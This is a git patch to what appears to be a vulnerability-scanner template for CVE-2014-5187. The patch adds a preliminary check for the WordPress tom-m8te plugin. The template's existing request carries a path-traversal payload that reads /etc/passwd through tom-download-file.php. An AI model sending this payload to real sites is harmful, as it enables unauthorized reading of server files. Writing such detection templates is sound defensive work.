From 0fc9ef43b85d17f8b2fcb16f7bac25ebeca5f27c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 6 Sep 2024 12:16:05 +0530
Subject: [PATCH] added-flow

---
 http/cves/2014/CVE-2014-5187.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/http/cves/2014/CVE-2014-5187.yaml b/http/cves/2014/CVE-2014-5187.yaml
index d4712ad4c4..9b68298307 100644
--- a/http/cves/2014/CVE-2014-5187.yaml
+++ b/http/cves/2014/CVE-2014-5187.yaml
@@ -26,7 +26,22 @@ info:
     publicwww-query: "/wp-content/plugins/tom-m8te/"
   tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,tom-m8te
 
+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"/wp-content/plugins/tom-m8te/")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
   - raw:
       - |
         GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1